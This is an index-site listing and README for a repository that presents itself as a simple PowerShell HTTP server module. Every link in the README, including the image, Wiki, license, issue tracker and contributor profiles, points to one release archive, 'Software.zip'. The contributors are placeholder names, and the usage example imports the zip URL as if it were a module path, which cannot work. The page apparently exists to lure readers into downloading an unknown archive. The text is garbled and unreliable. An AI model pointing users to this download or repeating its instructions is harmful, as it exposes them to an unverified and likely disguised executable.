An open API service indexing awesome lists of open source software.

https://github.com/brabaoeu/powershell_httpserver

Simple PowerShell HTTP Server (no dependencies, single file, PowerShell 5.1/7)
https://github.com/brabaoeu/powershell_httpserver

http http-server pentesting powershell powershell-module webserver

Last synced: about 1 year ago
JSON representation

Simple PowerShell HTTP Server (no dependencies, single file, PowerShell 5.1/7)

Awesome Lists containing this project

README

          

# PowerShell HTTP Server 🚀

![PowerShell HTTP Server](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip)

A simple, lightweight PowerShell HTTP Server module to create a standalone web server using PowerShell. No dependencies, single file, and compatible with PowerShell versions 5.1 and 7.

## Features 🌟

- Easy to set up and use
- No external dependencies required
- Works with both PowerShell 5.1 and 7
- Suitable for quick web server setups
- Ideal for penetration testing and local web development

## Installation đŸ› ī¸

To get started with the PowerShell HTTP Server, download the https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip file from the following link: [Download https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip)

Once you have downloaded the https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip file, extract it and launch the PowerShell script to start your HTTP server.

If the above link is not working, please check the "Releases" section of this repository for the latest version.

## Usage Example 💡

```powershell
Import-Module .\https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip
Start-HttpServer -Port 8080 -Root "C:\WebRoot"
```

In this example, we import the module and start the HTTP Server on port 8080 with the root directory set to "C:\WebRoot". You can then access your server by navigating to http://localhost:8080 in your web browser.

## Documentation 📖

For detailed documentation and usage instructions, please refer to the [Wiki](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip) of this repository.

## Contributors 🌟

- John Doe ([@johndoe](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip))
- Jane Smith ([@janesmith](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip))

## Support â„šī¸

If you encounter any issues or have any questions, feel free to open an [issue](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip).

## License 📝

This project is licensed under the MIT License - see the [LICENSE](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip) file for details.

[![Download https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip)](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip)

---

Now unleash the power of PowerShell with your very own HTTP Server! Happy coding! 🚀đŸ”Ĩ